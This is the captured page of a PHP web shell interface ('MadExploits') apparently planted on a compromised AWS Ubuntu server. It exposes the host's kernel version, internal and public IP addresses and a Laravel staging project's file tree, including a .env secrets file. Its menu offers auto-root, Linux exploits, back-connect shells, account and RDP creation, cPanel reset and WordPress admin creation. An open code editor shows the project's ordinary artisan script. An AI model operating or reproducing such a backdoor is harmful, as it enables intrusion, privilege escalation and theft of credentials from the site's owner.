Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.221.100.57
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cravings-staging /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwxr-x
app
[ DIR ]
drwxrwxr-x
bootstrap
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
database
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
public
[ DIR ]
drwxrwxr-x
resources
[ DIR ]
drwxrwxr-x
routes
[ DIR ]
drwxrwxr-x
storage
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
vendor
[ DIR ]
drwxrwxr-x
.babelrc
203
B
-rw-rw-r--
.editorconfig
213
B
-rw-rw-r--
.env
1.56
KB
-rwxr-xr-x
.env.example
514
B
-rw-rw-r--
.env.testing
776
B
-rw-rw-r--
.gitattributes
111
B
-rw-rw-r--
.gitignore
422
B
-rw-rw-r--
Dockerfile
717
B
-rw-rw-r--
artisan
1.65
KB
-rw-rw-r--
composer.json
1.94
KB
-rw-rw-r--
composer.lock
355.07
KB
-rw-rw-r--
docker-compose.yml
772
B
-rw-rw-r--
et --help
24.3
KB
-rw-rw-r--
nearby.save.blade
16.62
KB
-rw-rw-r--
package-lock.json
302.33
KB
-rw-rw-r--
package.json
904
B
-rw-rw-r--
phpunit.xml
1.21
KB
-rw-rw-r--
readme.md
3.83
KB
-rw-rw-r--
server.php
563
B
-rw-rw-r--
webpack.config.js
7.82
KB
-rw-rw-r--
webpack.mix.js
7.52
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : artisan
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any our classes "manually". Feels great to relax. | */ require __DIR__.'/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);
Close